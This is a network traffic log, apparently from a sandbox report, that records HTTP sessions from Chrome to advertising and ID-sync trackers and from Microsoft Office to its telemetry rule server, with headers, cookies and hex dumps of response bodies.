                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://t.sharethis.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: TDID=7d931d72-b6cd-40d8-9aaa-91033ac03d95; TDCPM=CAEYBSABKAIyCwjSn7LK4o62PRAFOAE.
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC523INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 215
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          server: Kestrel
                                                                                                                                                                                                                                                                                                                                                                          location: https://sync.sharethis.com/ttd?uid=7d931d72-b6cd-40d8-9aaa-91033ac03d95&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: TDID=7d931d72-b6cd-40d8-9aaa-91033ac03d95; expires=Tue, 14 Oct 2025 09:12:41 GMT; domain=.adsrvr.org; path=/; secure; samesite=none
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: TDCPM=CAEYASABKAIyCwigk6rm4o62PRAFOAFaBzFoMXkxYTdgAg..; expires=Tue, 14 Oct 2025 09:12:41 GMT; domain=.adsrvr.org; path=/; secure; samesite=none
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC215INData Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 79 6e 63 2e 73 68 61 72 65 74 68 69 73 2e 63 6f 6d 2f 74 74 64 3f 75 69 64 3d 37 64 39 33 31 64 37 32 2d 62 36 63 64 2d 34 30 64 38 2d 39 61 61 61 2d 39 31 30 33 33 61 63 30 33 64 39 35 26 67 64 70 72 3d 30 26 67 64 70 72 5f 63 6f 6e 73 65 6e 74 3d 22 3e 68 74 74 70 73 3a 2f 2f 73 79 6e 63 2e 73 68 61 72 65 74 68 69 73 2e 63 6f 6d 2f 74 74 64 3f 75 69 64 3d 37 64 39 33 31 64 37 32 2d 62 36 63 64 2d 34 30 64 38 2d 39 61 61 61 2d 39 31 30 33 33 61 63 30 33 64 39 35 26 67 64 70 72 3d 30 26 67 64 70 72 5f 63 6f 6e 73 65 6e 74 3d 3c 2f 61 3e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: Redirecting to: <a href="https://sync.sharethis.com/ttd?uid=7d931d72-b6cd-40d8-9aaa-91033ac03d95&gdpr=0&gdpr_consent=">https://sync.sharethis.com/ttd?uid=7d931d72-b6cd-40d8-9aaa-91033ac03d95&gdpr=0&gdpr_consent=</a>


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          116192.168.2.74989313.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 471
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: d280ac0f-001e-0079-3c69-1c12e8000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091241Z-17db6f7c8cfpm9w8b1ybgtytds0000000440000000005bdu
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          117192.168.2.74989113.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 416
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 36e78a2e-101e-008d-054a-1c92e5000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091241Z-17db6f7c8cfjxfnba42c5rukwg000000038g0000000008vm
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          118192.168.2.74989413.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 5d72a51a-801e-008f-7fe1-1a2c5d000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091241Z-17db6f7c8cfvzwz27u5rnq9kpc00000006m0000000000vw0
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          119192.168.2.74989213.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 415
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: fe0e2196-001e-0079-5547-1c12e8000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091241Z-17db6f7c8cfmhggkx889x958tc000000039000000000a0yq
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          120192.168.2.74989013.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 479
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: cb11dd2f-401e-0029-235b-1c9b43000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091241Z-17db6f7c8cf6f7vv3recfp4a6w00000003ag000000001gt9
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          121192.168.2.7498863.120.214.2184432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC616OUTGET /pixel?pid=1mpb5m0&t=gif&gdpr=0&gdpr_consent= HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: ps.eyeota.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://t.sharethis.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC720INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: mako_uid=1928a4d19e7-64f90000010f4043; Domain=eyeota.net; Path=/; Expires=Tue, 14 Oct 2025 09:12:41 GMT; Secure; SameSite=None;
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: SERVERID=16451~DM; Domain=eyeota.net; Path=/; Expires=Mon, 14 Oct 2024 09:22:41 GMT; Secure; SameSite=None;
                                                                                                                                                                                                                                                                                                                                                                          P3P: CP="CURa ADMa DEVa TAIo PSAo PSDo OUR SAMo BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR", policyref="http://ps.eyeota.net/w3c/p3p.xml"
                                                                                                                                                                                                                                                                                                                                                                          P3P: CP="CURa ADMa DEVa TAIo PSAo PSDo OUR SAMo BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR", policyref="http://ps.eyeota.net/w3c/p3p.xml"
                                                                                                                                                                                                                                                                                                                                                                          Location: /pixel/bounce/?pid=1mpb5m0&t=gif&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:41 GMT


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          122192.168.2.74989935.244.174.684432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC712OUTGET /395886.gif?partner_uid=3647697138334302238 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: idsync.rlcdn.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://t.sharethis.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: pxrc=CIbBs7gGEgUI6AcQABIFCOhHEAA=; rlas3=7skOM0+eLylT4afkMmWoSWJwh7sRpLhxpejeyPFRRaA=
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC782INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                                                                                          Location: https://ml314.com/csync.ashx?fp=6fda36a68f67ef461be4d0b26fb6f2141b917bffc7362f122d9a6451b0460fdcf4cb09cee1a4f8eb&person_id=3647697138334302238&eid=50082
                                                                                                                                                                                                                                                                                                                                                                          P3p: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: rlas3=7skOM0+eLylT4afkMmWoSWJwh7sRpLhxpejeyPFRRaA=; Path=/; Domain=rlcdn.com; Expires=Tue, 14 Oct 2025 09:12:41 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: pxrc=CIbBs7gGEgUI6AcQABIFCOhHEAASBQjbThAD; Path=/; Domain=rlcdn.com; Expires=Fri, 13 Dec 2024 09:12:41 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          123192.168.2.74989663.35.31.534432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:41 UTC405OUTGET /6/map HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: bcp.crwdcntrl.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: _cc_dc=1; _cc_id=d623ac854d7c5259de086b3e7c50fd78
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:42 UTC239INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:42 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html;charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 484
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: must-revalidate,no-cache,no-store
                                                                                                                                                                                                                                                                                                                                                                          Server: Jetty(9.4.38.v20210224)
